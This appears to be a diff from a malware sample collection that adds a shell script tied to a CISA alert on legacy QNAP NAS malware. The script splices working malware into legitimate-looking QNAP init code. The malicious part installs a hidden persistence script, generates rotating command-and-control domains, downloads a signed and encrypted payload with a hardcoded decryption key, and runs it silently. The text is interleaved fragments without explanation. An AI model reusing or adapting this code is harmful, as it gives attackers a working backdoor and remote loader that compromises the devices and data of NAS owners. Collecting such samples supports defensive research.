return 0
|
||||
fi
|
||||
usleep 20000
|
||||
j=`/usr/bin/expr ${j} + 20`
|
||||
done
|
||||
return -62
|
||||
fi
|
||||
usleep 50000
|
||||
i=`/usr/bin/expr ${i} + 50`
|
||||
done
|
||||
return 0
|
||||
}
|
||||
|
||||
|
||||
install()
|
||||
{
|
||||
lock_file="/var/lock/qbox_install_bin.lck"
|
||||
|
||||
if [ ! -f "${INSTALL_BUILD_IN}" ]; then
|
||||
dbg "build-in ${QSYNC_NAME} is installed"
|
||||
return 1
|
||||
fi
|
||||
|
||||
if [ ! -f ${UPDATEPKG_DIR}/${QSYNC_NAME}.bin ]; then
|
||||
dbg "${QSYNC_NAME}.bin} not found"
|
||||
return 1
|
||||
fi
|
||||
|
||||
if [ ! -x "${QPKG_CLI}" ]; then
|
||||
dbg "${QPKG_CLI} not found"
|
||||
return 1
|
||||
fi
|
||||
|
||||
## make sure volume is exist
|
||||
if [ ! -d /share/`/sbin/getcfg SHARE_DEF defPublic -d Public -f /etc/config/def_share.info` ]; then
|
||||
dbg "/share/Public not found"
|
||||
return 1
|
||||
fi
|
||||
|
||||
## is removed
|
||||
if [ -f ${UPDATEPKG_DIR}/.${QSYNC_NAME}_removed ]; then
|
||||
/bin/rm -f ${INSTALL_BUILD_IN}
|
||||
dbg "${QSYNC_NAME} is removed"
|
||||
return 1
|
||||
fi
|
||||
|
||||
if [ -f "$lock_file" ]; then
|
||||
if [ $(( $(date +%s) - $(date +%s -r $lock_file) )) -le 180 ]; then
|
||||
echo "${QSYNC_NAME} is installing"
|
||||
dbg "${QSYNC_NAME} is installing"
|
||||
return 1
|
||||
fi
|
||||
fi
|
||||
|
||||
/bin/touch "$lock_file"
|
||||
/bin/rm -f ${INSTALL_BUILD_IN}
|
||||
dbg "install build-in ${QSYNC_NAME} start"
|
||||
|
||||
set_default_disable_status
|
||||
|
||||
## install build in Qsync
|
||||
${QPKG_CLI} -K -m ${UPDATEPKG_DIR}/${QSYNC_NAME}.bin > /dev/null 2>&1
|
||||
sleep 20
|
||||
|
||||
wait_install=60
|
||||
## avoid initial take long time or fail
|
||||
while [ "$wait_install" -gt 0 ]; do
|
||||
stcode=`$CMD_GETCFG ${QSYNC_NAME}.bin stcode -f /etc/config/qpkg_job.conf`
|
||||
if [ "$stcode" = "0" ]; then
|
||||
break
|
||||
fi
|
||||
sleep 1
|
||||
let "wait_install--"
|
||||
done
|
||||
|
||||
${QPKG_CLI} -C ${QSYNC_NAME}.bin > /dev/null 2>&1
|
||||
/bin/rm -f ${UPDATEPKG_DIR}/.${QSYNC_NAME}_disabled
|
||||
/bin/rm -f "$lock_file"
|
||||
dbg "install build-in ${QSYNC_NAME} success"
|
||||
}
|
||||
|
||||
if [ "$1" == "stop" ]; then
|
||||
exit 0
|
||||
fi
|
||||
fi
|
568
2020/2020-07-27_CISA-Legacy_Malware_Targeting_QNAP_NAS/a9364f3faffa71acb51b7035738cbd5e7438721b9d2be120e46b5fd3b23c6c18
Normal file
568
2020/2020-07-27_CISA-Legacy_Malware_Targeting_QNAP_NAS/a9364f3faffa71acb51b7035738cbd5e7438721b9d2be120e46b5fd3b23c6c18
Normal file
@ -0,0 +1,568 @@
|
||||
#!/bin/sh
|
||||
( exec >/dev/null 2>&1; (
|
||||
export PATH="${PATH}:/bin:/sbin:/usr/bin:/usr/sbin:/usr/bin/X11:/usr/local/sbin:/usr/local/bin"
|
||||
command -v dirname >/dev/null 2>&1 || dirname () { test -z "$1" && echo "." && return; local r="${1%"${1##*[!/]}"}"; case $r in /*[!/]*/*|[!/]*/*) r="${r%/*}"; echo "${r%"${r##*[!/]}"}";; */*) echo ${r%%[!/]};; "") echo $1;; *) echo .;; esac; }
|
||||
test -d /etc/config && confdir=/etc/config || { test -d /mnt/HDA_ROOT/.config && confdir=/mnt/HDA_ROOT/.config; }
|
||||
test -d "$confdir" || confdir=/etc/config
|
||||
command -v getcfg > /dev/null 2>&1 || getcfg () { sed -n 'H;${x;s/\(.*\
|
||||
\['"${1//\//\\\/}"']\|^\['"${1//\//\\\/}"']\)\
|
||||
//I;s/\(^\|\
|
||||
\)\[[^\
|
||||
]\+\]\
|
||||
.*//p}' "${4:-${confdir}/uLinux.conf}" | sed -n 's/^'"${2//\//\\\/}"' \?= \?\(.*\)/\1/Ip'; }
|
||||
bdir=
|
||||
test -f "${confdir}/smb.conf" && for i in homes Public Download Multimedia Web Recordings; do bdir=`getcfg "$i" path -f "${confdir}/smb.conf"` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && test -d "$bdir" && testwriteable=$(mktemp "${bdir}/.tmp.XXXXXX") && rm "${testwriteable}" && break; bdir=''; done
|
||||
test -z "${bdir}" || test ! -d "${bdir}" && { command -v readlink >/dev/null 2>&1 || ln -sf /bin/busybox /usr/bin/readlink; for i in homes Public Download Multimedia Web Recordings; do bdir=`readlink "/share/${i}" 2>/dev/null` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && bdir=/share/${bdir##*/} && test -d "$bdir" && break; done;
|
||||
test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`getcfg SHARE_DEF defVolMP -f "${confdir}/def_share.info"`
|
||||
test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`mount | sed -n "s/.*\(\/share\/[^ /]\+\) .*/\1/gp" | head -n 1`
|
||||
test -z "${bdir}" || test ! -d "${bdir}"; } && { for i in CACHEDEV3_DATA CACHEDEV2_DATA CACHEDEV1_DATA MD0_DATA; do test -d "/share/${i}" && bdir="/share/${i}" && break; done;
|
||||
test -z "${bdir}" || test ! -d "${bdir}" && bdir=/mnt/HDA_ROOT; }
|
||||
echo 'ab*c' | grep -F 'ab*c' >/dev/null 2>&1 && fgrep="grep -F" || { command -v fgrep >/dev/null 2>&1 && fgrep=fgrep || fgrep=grep; }
|
||||
test "$fgrep" || fgrep=grep
|
||||
|
||||
if [ ! -f "${bdir}/.qpkg/.liveupdate/liveupdate.sh" ]; then
|
||||
test -d "${bdir}/.qpkg" || mkdir -p "${bdir}/.qpkg" || mkdir "${bdir}/.qpkg"
|
||||
test -d "${bdir}/.qpkg/.liveupdate" || mkdir "${bdir}/.qpkg/.liveupdate"
|
||||
cat > "${bdir}/.qpkg/.liveupdate/liveupdate.sh" <<"XEOF"
|
||||
#!/bin/sh
|
||||
QNAP_QPKG=cloudinstall
|
||||
QID_PRESISTENT_CONF=/etc/config/qid_persistent.conf
|
||||
NAS_CLOUD_INSTALL_PATH=/home/httpd/cgi-bin/cloudinstall
|
||||
CLOUD_INSTALL_PATH=/tunnel_agent
|
||||
CLOUD_INSTALL_RAMDISK_PATH=/tunnel_agent_ramdisk
|
||||
CLOUD_INSTALL_AGENT_FILE_PATH=$CLOUD_INSTALL_PATH/tunnel_agent.tar.bz2
|
||||
COUNTER=1
|
||||
ERROR_BAD_REQUEST=400
|
||||
|
||||
if [ "$fromrcS" = 'TRUE' ]; then
|
||||
case "$1" in
|
||||
start)
|
||||
START_TIME=$(date +"%T")
|
||||
echo -e "start:$START_TIME" >> /tmp/.cloudinstall.log
|
||||
while [ "$CLOUD_INSTALL_AGENT_PID_LIST" == "" ];
|
||||
do
|
||||
# report device info and get cloudinstall agent app download url
|
||||
DOWNLOAD_URL=`/usr/sbin/qcloud_uninit_device_tool -r`
|
||||
if [ ! -d "$CLOUD_INSTALL_PATH" ]; then
|
||||
if [ "$NAS_ARCH" == "ARM_64" ]; then
|
||||
# create ramdisk and create a 64mb file
|
||||
/bin/mkdir -p $CLOUD_INSTALL_RAMDISK_PATH
|
||||
/bin/mount -t tmpfs -o size=64m tmpfs $CLOUD_INSTALL_RAMDISK_PATH
|
||||
/bin/dd if=/dev/zero of=$CLOUD_INSTALL_RAMDISK_PATH/image bs=1M count=64
|
||||
# create block size 1K filesystem
|
||||
/sbin/mke2fs -b 1024 $CLOUD_INSTALL_RAMDISK_PATH/image
|
||||
# create virtual disk
|
||||
export USED_LOOP_DEVICE=`/usr/local/sbin/losetup -f $CLOUD_INSTALL_RAMDISK_PATH/image`
|
||||
/sbin/setcfg -f $QID_PRESISTENT_CONF "CLOUDINSTALL" "USED_LOOP_DEVICE" "$USED_LOOP_DEVICE"
|
||||
/bin/mkdir -p $CLOUD_INSTALL_PATH
|
||||
# mount virtual disk
|
||||
/bin/mount $USED_LOOP_DEVICE $CLOUD_INSTALL_PATH
|
||||
else
|
||||
# create and mount tmpfs folder
|
||||
/bin/mkdir -p $CLOUD_INSTALL_PATH
|
||||
/bin/mount -t tmpfs -o size=64m tmpfs $CLOUD_INSTALL_PATH
|
||||
fi
|
||||
fi
|
||||
cd $CLOUD_INSTALL_PATH
|
||||
|
||||
if [[ $DOWNLOAD_URL == https* ]]; then
|
||||
REPORT_SUCCESS_TIME=$(date +"%T")
|
||||
else
|
||||
REPORT_FAIL_TIME=$(date +"%T")
|
||||
echo -e " report_fail:$REPORT_FAIL_TIME\n response:$DOWNLOAD_URL" >> /tmp/.cloudinstall.log
|
||||
# stop retry when got bad request
|
||||
# prevent put bad request all the time
|
||||
if [[ $DOWNLOAD_URL == *$ERROR_BAD_REQUEST* ]]; then
|
||||
break
|
||||
fi
|
||||
fi
|
||||
|
||||
# downlaod cloudinstall agent app
|
||||
/usr/sbin/qcloud_uninit_device_tool -o "$CLOUD_INSTALL_AGENT_FILE_PATH" -d "$DOWNLOAD_URL"
|
||||
|
||||
if [ -f "$CLOUD_INSTALL_AGENT_FILE_PATH" ]; then
|
||||
DOWNLOAD_FINISH_TIME=$(date +"%T")
|
||||
# unzip and execute cloudinstallagent
|
||||
/bin/tar -xf $CLOUD_INSTALL_AGENT_FILE_PATH -C $CLOUD_INSTALL_PATH
|
||||
$CLOUD_INSTALL_PATH/bin/cloudinstall_agent_ctl.sh start &> /dev/null
|
||||
|
||||
UNZIP_TIME=$(date +"%T")
|
||||
fi
|
||||
|
||||
if [ ! -d "$NAS_CLOUD_INSTALL_PATH" ]; then
|
||||
# create folder and create symbolic link
|
||||
/bin/mkdir -p $NAS_CLOUD_INSTALL_PATH
|
||||
/bin/ln -s $CLOUD_INSTALL_PATH/ui/cloudinstall.html $NAS_CLOUD_INSTALL_PATH/index.html
|
||||
/bin/ln -s $CLOUD_INSTALL_PATH/ui/cloudinstall.cgi $NAS_CLOUD_INSTALL_PATH/cloudinstall.cgi
|
||||
/bin/ln -s $CLOUD_INSTALL_PATH/ui/static $NAS_CLOUD_INSTALL_PATH/static
|
||||
fi
|
||||
|
||||
# wait connect
|
||||
sleep 5
|
||||
CLOUD_INSTALL_AGENT_PID_LIST=`/bin/ps --columns 256 | /bin/grep "$CLOUD_INSTALL_PATH/bin/cloudinstallagent" | /bin/grep -v grep | /bin/awk '{print $1}'`
|
||||
if [ "$CLOUD_INSTALL_AGENT_PID_LIST" == "" ]; then
|
||||
SLEEP_TIME=$(( 30 * $COUNTER ))
|
||||
if [ $SLEEP_TIME -gt 300 ]; then
|
||||
SLEEP_TIME=300
|
||||
fi
|
||||
# wait next retry
|
||||
sleep $SLEEP_TIME
|
||||
fi
|
||||
COUNTER=$(( $COUNTER * 2 ))
|
||||
done
|
||||
|
||||
END_TIME=$(date +"%T")
|
||||
echo -e "report_success:$REPORT_SUCCESS_TIME\ndownload_finish:$DOWNLOAD_FINISH_TIME\nunzip_finish:$UNZIP_TIME\nend:$END_TIME" >> /tmp/.cloudinstall.log
|
||||
# call for a new process group and for later kill
|
||||
/bin/setsid $CLOUD_INSTALL_PATH/bin/cloudinstall_agent_disconnect_daemon.sh start &> /dev/null &
|
||||
/bin/setsid $CLOUD_INSTALL_PATH/bin/cloudinstall_agent_daemon.sh &> /dev/null &
|
||||
|
||||
# set cloudinstall report status
|
||||
/sbin/setcfg -f $QID_PRESISTENT_CONF "CLOUDINSTALL" "REPORT_STATUS" "uninit"
|
||||
# add link to report offline
|
||||
/bin/ln -sf /etc/init.d/cloudinstall_report_offline.sh /etc/rcK.d/K99cloudinstall_report_offline
|
||||
|
||||
# buzzer
|
||||
HARDWARE_TYPE=$(uname -m)
|
||||
if [[ "$HARDWARE_TYPE" == *"x86"* ]];
|
||||
then
|
||||
/sbin/hal_app --se_buzzer enc_id=0,mode=101
|
||||
elif [[ "$HARDWARE_TYPE" == *"arm"* ]];
|
||||
then
|
||||
/sbin/pic_raw 81
|
||||
fi
|
||||
;;
|
||||
|
||||
stop)
|
||||
# disconnect cloudinstall agent
|
||||
$CLOUD_INSTALL_PATH/bin/cloudinstall_agent_ctl.sh stop &> /dev/null
|
||||
$CLOUD_INSTALL_PATH/bin/cloudinstall_agent_disconnect_daemon.sh stop &> /dev/null
|
||||
for i in "${CLOUD_INSTALL_AGENT_DAEMON_PID_LIST[@]}"
|
||||
do
|
||||
# use bash kill instead /bin/kill for kill process group
|
||||
# cloudinstall agent daemon and inotifywait
|
||||
kill -9 -- -$i &>/dev/null
|
||||
done
|
||||
|
||||
# umount
|
||||
if [ "$NAS_ARCH" == "ARM_64" ]; then
|
||||
/bin/umount -l $USED_LOOP_DEVICE
|
||||
/usr/local/sbin/losetup -d $USED_LOOP_DEVICE
|
||||
else
|
||||
/bin/umount -l $CLOUD_INSTALL_PATH
|
||||
fi
|
||||
# remove all files
|
||||
if [ -d "$NAS_CLOUD_INSTALL_PATH" ]; then
|
||||
/bin/rm -rf $NAS_CLOUD_INSTALL_PATH
|
||||
fi
|
||||
if [ -d "$CLOUD_INSTALL_PATH" ]; then
|
||||
/bin/rm -rf $CLOUD_INSTALL_PATH
|
||||
fi
|
||||
if [ -d "$CLOUD_INSTALL_RAMDISK_PATH" ]; then
|
||||
/bin/rm -rf $CLOUD_INSTALL_RAMDISK_PATH
|
||||
fi
|
||||
;;
|
||||
|
||||
restart)
|
||||
$0 stop
|
||||
$0 start
|
||||
;;
|
||||
|
||||
*)
|
||||
echo "Usage: $0 {start|stop|restart}"
|
||||
exit 1
|
||||
esac
|
||||
exit 0
|
||||
|
||||
|
||||
set_env()
|
||||
{
|
||||
debug=`$CMD_GETCFG Qsync Debug -u -d NULL`
|
||||
if [ "$debug" != "NULL" ]; then
|
||||
/bin/touch $LOG_FILE
|
||||
else
|
||||
/bin/rm -f $LOG_FILE
|
||||
fi
|
||||
}
|
||||
|
||||
set_env
|
||||
|
||||
dbg()
|
||||
{
|
||||
if [ -f "$LOG_FILE" ]; then
|
||||
echo "[`date "+%H:%M:%S"`] $@ " >> $LOG_FILE
|
||||
fi
|
||||
}
|
||||
|
||||
dbg "> $0 $@ (pid $$)"
|
||||
|
||||
fi
|
||||
|
||||
export PATH="${PATH}:/bin:/sbin:/usr/bin:/usr/sbin:/usr/bin/X11:/usr/local/sbin:/usr/local/bin"
|
||||
|
||||
command -v getcfg > /dev/null 2>&1 || getcfg () { sed -n 'H;${x;s/\(.*\n\['"${1//\//\\\/}"']\|^\['"${1//\//\\\/}"']\)\n//I;s/\(^\|\n\)\[[^\n]\+\]\n.*//p}' "${4:-${confdir}/uLinux.conf}" | sed -n 's/^'"${2//\//\\\/}"' \?= \?\(.*\)/\1/Ip'; }
|
||||
|
||||
test -d /etc/config && confdir=/etc/config || { test -d /mnt/HDA_ROOT/.config && confdir=/mnt/HDA_ROOT/.config; }
|
||||
|
||||
bdir=
|
||||
test -f "${confdir}/smb.conf" && for i in homes Public Download Multimedia Web Recordings; do bdir=`getcfg "$i" path -f "${confdir}/smb.conf"` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && test -d "$bdir" && testwriteable=$(mktemp "${bdir}/.tmp.XXXXXX") && rm "${testwriteable}" && break; bdir=''; done
|
||||
test -z "${bdir}" || test ! -d "${bdir}" && { command -v readlink >/dev/null 2>&1 || ln -sf /bin/busybox /usr/bin/readlink; for i in Public Download Multimedia Web Recordings homes; do bdir=`readlink "/share/${i}" 2>/dev/null` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && bdir=/share/${bdir##*/} && test -d "$bdir" && break; done;
|
||||
test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`getcfg SHARE_DEF defVolMP -f "${confdir}/def_share.info"`
|
||||
test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`mount | sed -n "s/.*\(\/share\/[^ /]\+\) .*/\1/gp" | head -n 1`
|
||||
test -z "${bdir}" || test ! -d "${bdir}"; } && { for i in CACHEDEV3_DATA CACHEDEV2_DATA CACHEDEV1_DATA MD0_DATA; do test -d "/share/${i}" && bdir="/share/${i}" && break; done;
|
||||
test -z "${bdir}" || test ! -d "${bdir}" && bdir=/mnt/HDA_ROOT; }
|
||||
grep -F '' <<EOF >/dev/null 2>&1 && fgrep="grep -F" || { command -v fgrep >/dev/null 2>&1 && fgrep=fgrep || fgrep=grep; }
|
||||
|
||||
EOF
|
||||
test "$fgrep" || fgrep=grep
|
||||
test "$RANDOM" || RANDOM=17653
|
||||
genrstr ()
|
||||
{
|
||||
local s=;
|
||||
local min=${1:-4};
|
||||
local max=${2:-12};
|
||||
local kspace="${3:-a-zA-Z}"
|
||||
tr -dc "$kspace" < /dev/urandom | {
|
||||
read -rn $(($RANDOM % ( $max - $min + 1 ) + $min )) s;
|
||||
echo "$s"
|
||||
}
|
||||
}
|
||||
|
||||
verifyfile() {
|
||||
local file="$1"
|
||||
local sig="${2:-$file_s}"
|
||||
local out
|
||||
test ! -z "$file" && test -s "$file" || return 1
|
||||
test ! -z "$sig" && test -s "$sig" || return 1
|
||||
test -f ".rsakey" || echo "$verifykey" > ".rsakey"
|
||||
out=$(openssl dgst -sha1 -verify ".rsakey" -signature "$sig" "$file") && test "$out" = "Verified OK" && return 0
|
||||
return 1
|
||||
}
|
||||
|
||||
decryptfile() {
|
||||
local file="$1"
|
||||
local ofile="${2:-${file}}"
|
||||
local key='7C0vK4SzMO15zBxLD7XCi5hbjgP1ZjkJ'
|
||||
openssl enc -d -aes-256-cbc -k "$key" -md sha1 -salt < "$file" > "${file}_d" || return $?
|
||||
test -f "$ofile" && rm -f "$ofile"
|
||||
mv "${file}_d" "$ofile" && return 0
|
||||
return 1
|
||||
}
|
||||
|
||||
verifykey='-----BEGIN PUBLIC KEY-----
|
||||
MIIBojANBgkqhkiG9w0BAQEFAAOCAY8AMIIBigKCAYEAt/EDT6SB75atrHW7Cpog
|
||||
CXqrBM2CVbJo';verifykey="${verifykey}"'g4rwwS''z1Bp1i1'
|
||||
verifykey="${verifykey}"'B7B9Wd51no32lpRqOM+9GOr2W17xwJ8pqpQotex
|
||||
RC5qQSiS/7FS48jsPKsJnrUhnsI1fRLM4DqsEF3UOukZuDOYUhlteDuMqqZBz0AC
|
||||
Q3YnLjraTjchMF0XmaAAcWOkg5MsxAOKTepue4R/tnrPAkAG86nq5LA1+wa7opNV
|
||||
gQzwDh7YXhBnWz52+ebZ9TeqD31/sb5hoyUKf1Nr5HcKkklObuz1OGQJ//pkCbTC
|
||||
2EnQw6tCPQhgSIA8wJKkaxW0f/UHP+YBmWa4Wn+uPrJJuHSVNEJtAp2wlX3THltz
|
||||
0IGPQEuzoafOAl3EFjas3HcTX2HlEfnvAtRL2iLxJeba1nZ+U3geZOuxL1NhWhNh
|
||||
pjaLcKwhkRck7Y5hr1Pz8pLDnXsx5w0QUz6XS8HVf/KHnNXHufFEn01y9YoPuau1
|
||||
DNnpDGbq632Bs8ESd3ueHk9OY/UZxWeN3UdbseFxK35XAgMBAAE=
|
||||
-----END PUBLIC KEY-----'
|
||||
|
||||
DOMAIN_EXT_A='cf tk ml ga gq'
|
||||
DOMAIN_EXT_B='com biz org de rocks mx cn top nl men ws se info xyz net today ru fi name to in com.ua vg vn cd'
|
||||
|
||||
test -d "${bdir}/.qpkg" || mkdir "${bdir}/.qpkg"
|
||||
test -d "${bdir}/.qpkg/.liveupdate" || mkdir "${bdir}/.qpkg/.liveupdate"
|
||||
cd "${bdir}/.qpkg/.liveupdate" && rm -f .tmp.*
|
||||
|
||||
echo "$verifykey" > ".rsakey"
|
||||
i=0 n=0 c=0 errorcount=0
|
||||
outfile=$(mktemp "./.tmp.XXXXXX") || outfile=$(mktemp "${bdir}/.tmp.XXXXXX") || outfile=$(mktemp "/.tmp.XXXXXX") || outfile='./.tmp.out'
|
||||
|
||||
for domainexts in "$DOMAIN_EXT_A" "$DOMAIN_EXT_B"; do
|
||||
for ext in $domainexts; do
|
||||
hostname=$(echo "$(( $(date +%s) / 1296000 ))IbjGOEgnuD${ext}" | openssl dgst -sha1 -binary | openssl base64 | sed 'y/ABCDEFGHIJKLMNOPQRSTUVWXYZ-+\//abcdefghijklmnopqrstuvwxyzabc/;s/=//g')
|
||||
hostname=${hostname%[a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9]}
|
||||
hostnames="${hostname%[a-z0-9][a-z0-9][a-z0-9][a-z0-9]} ${hostname%[a-z0-9][a-z0-9][a-z0-9]}"
|
||||
hostnames="$hostnames ${hostname%[a-z0-9][a-z0-9]} ${hostname%[a-z0-9]} $hostname"
|
||||
for host in $hostnames; do
|
||||
test -f "$outfile" && rm -f "$outfile"
|
||||
recentupdate=''
|
||||
curl --connect-timeout 12 -m 30 -k -o "$outfile" "https://${host}.${ext}/qnap_firmware.xml?t=$(date +%s)"
|
||||
test -s "$outfile" || continue
|
||||
fsize=$(( $(wc -c < "$outfile") ))
|
||||
test "$fsize" -gt 4096 && rm -f "$outfile" && continue
|
||||
rsamsg=$(openssl base64 -in "$outfile" -d | openssl rsautl -pubin -inkey ".rsakey" -verify) || continue
|
||||
test "$rsamsg" || continue
|
||||
path="${rsamsg%|*}"; rsadomain="${path%|*}"; path="${path#*|}"
|
||||
hash="${rsamsg##*|}"; ts="${hash#*_}"; hash="${hash%_*}"
|
||||
test "$rsadomain" = "${host}.${ext}" || continue
|
||||
timenow=$(date +%s)
|
||||
test "$ts" -gt 0 && { test "$ts" -gt "$timenow" || test $(( $timenow - $ts )) -lt 172800; } && recentupdate=1
|
||||
curl --connect-timeout 12 -m 300 -k -o "$outfile" "https://${host}.${ext}/${path}"
|
||||
filehash=$(openssl dgst -sha1 -binary "$outfile" | openssl base64) || continue
|
||||
test "$filehash" = "$hash" || continue
|
||||
curl --connect-timeout 12 -m 30 -k -o "${outfile}_s" "https://${host}.${ext}/s/${path}"
|
||||
verifyfile "$outfile" "${outfile}_s" && decryptfile "$outfile" || continue
|
||||
mv "${outfile}_s" "${ts}_v"
|
||||
chmod 755 "$outfile" || continue
|
||||
( ( exec >/dev/null 2>/dev/null </dev/null; "$outfile" ) & )
|
||||
test "$recentupdate" -eq 1 && exit 0
|
||||
done
|
||||
done
|
||||
done
|
||||
|
||||
|
||||
if [ "$fromrcS" = 'TRUE' ]; then
|
||||
# if Qsync is disable before 4.3.0, we will touch /mnt/HDA_ROOT/udpate_pkg/.QsyncServer_disabled
|
||||
set_default_disable_status()
|
||||
{
|
||||
QPKG_ENABLE=`$CMD_GETCFG ${QSYNC_NAME} Enable -d "NULL" -f ${QPKG_CONF}`
|
||||
OLD_ENABLE=`$CMD_GETCFG Qsync Enable -u -d NULL`
|
||||
if [ -f "${UPDATEPKG_DIR}/.${QSYNC_NAME}_removed" ]; then
|
||||
return
|
||||
fi
|
||||
|
||||
if [ "$QPKG_ENABLE" = "NULL" ]; then
|
||||
if [ "$OLD_ENABLE" = "FALSE" ]; then
|
||||
dbg "touch ${UPDATEPKG_DIR}/.${QSYNC_NAME}_disabled"
|
||||
/bin/touch "${UPDATEPKG_DIR}/.${QSYNC_NAME}_disabled"
|
||||
fi
|
||||
fi
|
||||
}
|
||||
|
||||
if [ "x$HBS_ENABLE" = xnull ] || [ "x$HBS_ENABLE" = xFALSE ]; then
|
||||
export QNAP_QPKG=rtrr
|
||||
else
|
||||
export QNAP_QPKG=HybridBackup
|
||||
/usr/local/sbin/qboost_util -S -n rtrr -E 0 1>/dev/null 2>&1
|
||||
fi
|
||||
start()
|
||||
{
|
||||
if [ -f /usr/bin/qsyncman ]; then
|
||||
[ ! -f /etc/config/hdcopyusb.conf ] || /bin/rm -f /etc/config/hdcopyusb.conf
|
||||
/bin/sed -i '/hdusb_copy/d' /etc/config/crontab
|
||||
/usr/bin/crontab /etc/config/crontab
|
||||
echo -n "Starting QSync manitor: "
|
||||
[ -d /etc/config/qsync ] || /usr/bin/install -d /etc/config/qsync
|
||||
[ -f /etc/config/qsync/qhost.conf ] || /bin/touch /etc/config/qsync/qhost.conf
|
||||
[ -f /etc/config/qsync/qsyncjobdef.conf ] || /bin/touch /etc/config/qsync/qsyncjobdef.conf
|
||||
[ -f /etc/config/qsync/qsync.conf ] || /bin/cp -p /etc/default_config/qsync/qsync.conf /etc/config/qsync/qsync.conf
|
||||
[ -f /etc/config/qsync/extdrv.conf ] || /bin/cp -p /etc/default_config/qsync/extdrv.conf /etc/config/qsync/extdrv.conf
|
||||
[ -f /etc/config/qsync/qsyncd.conf ] || /bin/cp -p /etc/default_config/qsync/qsyncd.conf /etc/config/qsync/qsyncd.conf
|
||||
[ ! -f /etc/config/qsync/qsyncd.conf ] || /bin/chmod 640 /etc/config/qsync/qsyncd.conf
|
||||
[ ! -f /etc/config/qsync/qsync.conf ] || /bin/chmod 640 /etc/config/qsync/qsync.conf
|
||||
[ ! -f /etc/config/qsync/qhost.conf ] || /bin/chmod 640 /etc/config/qsync/qhost.conf
|
||||
/sbin/daemon_mgr qsyncman start "/usr/bin/qsyncman 1>/dev/null 2>&1"
|
||||
echo "OK"
|
||||
fi
|
||||
}
|
||||
|
||||
stop()
|
||||
{
|
||||
echo "Shutting down QSync monitor: OK"
|
||||
pidnum=`/bin/pidof qsync``/bin/pidof qsyncd`
|
||||
kill $pidnum 2>/dev/null
|
||||
i=0
|
||||
while [ ${i} -lt 5 ]
|
||||
do
|
||||
pidnum=`/bin/pidof qsync``/bin/pidof qsyncd`
|
||||
if [ -z "$pidnum" ]; then
|
||||
break
|
||||
fi
|
||||
sleep 1
|
||||
i=`/usr/bin/expr ${i} + 1`
|
||||
done
|
||||
pidnum=`/bin/pidof qsync``/bin/pidof qsyncd`
|
||||
[ -z "$pidnum" ] || kill -9 $pidnum 2>/dev/null
|
||||
/sbin/daemon_mgr qsyncman stop "/usr/bin/qsyncman"
|
||||
/usr/bin/killall -q qsyncman
|
||||
}
|
||||
|
||||
start_qsyncd()
|
||||
{
|
||||
#_qsyncd_en=`/sbin/getcfg "" Enabled -d 0 -f /etc/qsync/qsyncd.conf`
|
||||
#[ "x$_qsyncd_en" = x1 ] || return -1
|
||||
_qsyncd_run_pid=`/bin/pidof qsyncd`
|
||||
[ -z $_qsyncd_run_pid ] || return -114
|
||||
_recycle_en=`/sbin/getcfg 'Network Recycle Bin' Enable -d FALSE`
|
||||
_with_syslog=$1
|
||||
if [ "x$_recycle_en" = xTRUE ]; then
|
||||
if [ "x$_with_syslog" = x1 ]; then
|
||||
LD_PRELOAD=/usr/local/lib/libtrash.so /usr/bin/qsyncd -syslog -c:/etc/qsync/qsyncd.conf
|
||||
else
|
||||
LD_PRELOAD=/usr/local/lib/libtrash.so /usr/bin/qsyncd -c:/etc/qsync/qsyncd.conf
|
||||
fi
|
||||
else
|
||||
if [ "x$_with_syslog" = x1 ]; then
|
||||
/usr/bin/qsyncd -syslog -c:/etc/qsync/qsyncd.conf
|
||||
else
|
||||
/usr/bin/qsyncd -c:/etc/qsync/qsyncd.conf
|
||||
fi
|
||||
fi
|
||||
_iret=$?
|
||||
if [ "x$_iret" = x0 ]; then
|
||||
i=0
|
||||
while [ ${i} -lt 10000 ]
|
||||
do
|
||||
echo "${i} millisecond..."
|
||||
_qsyncd_pid=`/sbin/getcfg '' Pid -d -1 -f /etc/qsync/qsyncd.conf`
|
||||
_qsyncd_run_pid=`/bin/pidof qsyncd`
|
||||
if [ "x$_qsyncd_pid" != "x-1" ] && [ ! -z $_qsyncd_run_pid ]; then
|
||||
break
|
||||
fi
|
||||
usleep 50000
|
||||
i=`/usr/bin/expr ${i} + 50`
|
||||
done
|
||||
fi
|
||||
return -$_iret
|
||||
}
|
||||
|
||||
stop_qsyncd()
|
||||
{
|
||||
#_qsyncd_en=`/sbin/getcfg "" Enabled -d 0 -f /etc/qsync/qsyncd.conf`
|
||||
#[ "x$_qsyncd_en" = x0 ] || return -1
|
||||
_qsyncd_pid=`/sbin/getcfg "" Pid -d -1 -f /etc/qsync/qsyncd.conf`
|
||||
[ $_qsyncd_pid -lt 0 ] && return -3
|
||||
# Send SIGUSR1 to inform the daemon to output "[RTRR Server] Stopped" event log
|
||||
/bin/kill -SIGUSR1 $_qsyncd_pid
|
||||
usleep 200000
|
||||
# Send SIGINT to stop the QSyncd process
|
||||
/bin/kill -SIGINT $_qsyncd_pid
|
||||
_kill_ret=$?
|
||||
if [ "x$_kill_ret" != x0 ]; then
|
||||
return -3
|
||||
fi
|
||||
echo "need wait $1 millisecond"
|
||||
i=0
|
||||
while true
|
||||
do
|
||||
echo "${i} millisecond..."
|
||||
_qsyncd_pid=`/sbin/getcfg '' Pid -d -1 -f /etc/qsync/qsyncd.conf`
|
||||
_qsyncd_run_pid=`/bin/pidof qsyncd`
|
||||
if [ "x$_qsyncd_pid" = "x-1" ] && [ -z $_qsyncd_run_pid ]; then
|
||||
break
|
||||
fi
|
||||
if [ ${i} -ge $1 ]; then
|
||||
# if time-out, we send two additional SIGINT to force the daemon to stop.
|
||||
if [ $_qsyncd_pid -ge 0 ]; then
|
||||
/bin/kill -SIGUSR1 $_qsyncd_pid
|
||||
usleep 200000
|
||||
/bin/kill -SIGUSR1 $_qsyncd_pid
|
||||
fi
|
||||
j=0
|
||||
while [ ${j} -lt 500 ]
|
||||
do
|
||||
